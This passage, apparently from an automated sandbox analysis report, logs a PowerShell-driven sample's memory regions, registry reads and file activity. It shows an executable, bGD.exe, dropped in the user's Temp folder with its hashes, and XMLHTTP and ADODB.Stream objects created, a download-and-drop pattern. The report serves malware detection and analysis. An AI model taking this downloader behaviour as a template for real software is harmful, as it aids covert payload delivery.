| system.management.ni.dll | 0x7fedf560000 | 0x7fedf6cbfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fedf6d0000 | 0x7fedfd74fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fedfd80000 | 0x7fedfdbdfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fedfdc0000 | 0x7fedfed7fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fedfee0000 | 0x7fee00f5fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fee0100000 | 0x7fee01e4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee01f0000 | 0x7fee0299fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fee02a0000 | 0x7fee02d1fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fee02e0000 | 0x7fee0348fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fee0350000 | 0x7fee067dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee0680000 | 0x7fee11dcfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee1460000 | 0x7fee1511fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee1520000 | 0x7fee1f42fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee1f50000 | 0x7fee2e2bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee2e30000 | 0x7fee37ccfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee6200000 | 0x7fee6298fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee62a0000 | 0x7fee630efff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef8e40000 | 0x7fef8e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef8e50000 | 0x7fef8e83fff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x7fef9360000 | 0x7fef9366fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef9b40000 | 0x7fef9bbffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef9bc0000 | 0x7fef9bcefff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefb340000 | 0x7fefb396fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb730000 | 0x7fefb73afff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb760000 | 0x7fefb778fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefbb00000 | 0x7fefbb2cfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefc4b0000 | 0x7fefc505fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefc510000 | 0x7fefc63bfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc690000 | 0x7fefc883fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefcd50000 | 0x7fefcd5bfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefcf30000 | 0x7fefcf4dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefd180000 | 0x7fefd1c6fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefd480000 | 0x7fefd496fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd980000 | 0x7fefd9a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefda80000 | 0x7fefda8efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefdb90000 | 0x7fefdb9efff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefdce0000 | 0x7fefdd15fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefddd0000 | 0x7fefdde9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefdfd0000 | 0x7fefed57fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7feff0e0000 | 0x7feff1bafff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff1c0000 | 0x7feff1defff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff2f0000 | 0x7feff4c6fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7feff640000 | 0x7feff6b0fff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff9a0000 | 0x7feffa38fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff0005ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00060000 | 0x7ff00060000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0010ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00110000 | 0x7ff00110000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00190000 | 0x7ff00190000 | 0x7ff0019ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 103 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe | 132.00 KB |
MD5:
31342e4b67aaa69e9a8a6bd6604dc668
SHA1: d4159ed9b7f143d9c686a51b16960d33565bec4a SHA256: 5f1032665271c1fdf50e36a10afca8f2413e297b73d5114a2ed3d0022008c649 SSDeep: 3072:rX/2i7MRvfSlSu+oV1D2y+Gsi1iOH++jj3fVQhxbfNWb8uTmTZ98+qZMKQTvIhEX:yi7MRvfSlSu+oV1D2y+GskiOH++j4xb3 |
|
|
Host Behavior
COM (3)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | msxml2.xmlhttp | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | adodb.stream | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | msxml2.xmlhttp | IDispatch | method_name = Open |
|
1 |
File (235)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\\bGD.exe | - |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
2 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
8 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
6 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\bGD.exe | type = file_attributes |
|
3 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
44 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
2 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
6 | |
| Read | - | size = 4096, size_out = 2530 |
|
1 | |
| Read | - | size = 542, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 4096 |
|
75 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2762 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 310, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 0 |
|
5 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 281 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 2228 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 844, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 4096, size_out = 3736 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | size = 360, size_out = 0 |
|
1 | |
| Write | C:\Users\aETAdzjz\AppData\Local\Temp\\bGD.exe | - |
|
1 |
Registry (149)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | System | - |
|
1 | |
| Open Key | System\PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
10 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
10 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | - | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | - | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | - | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
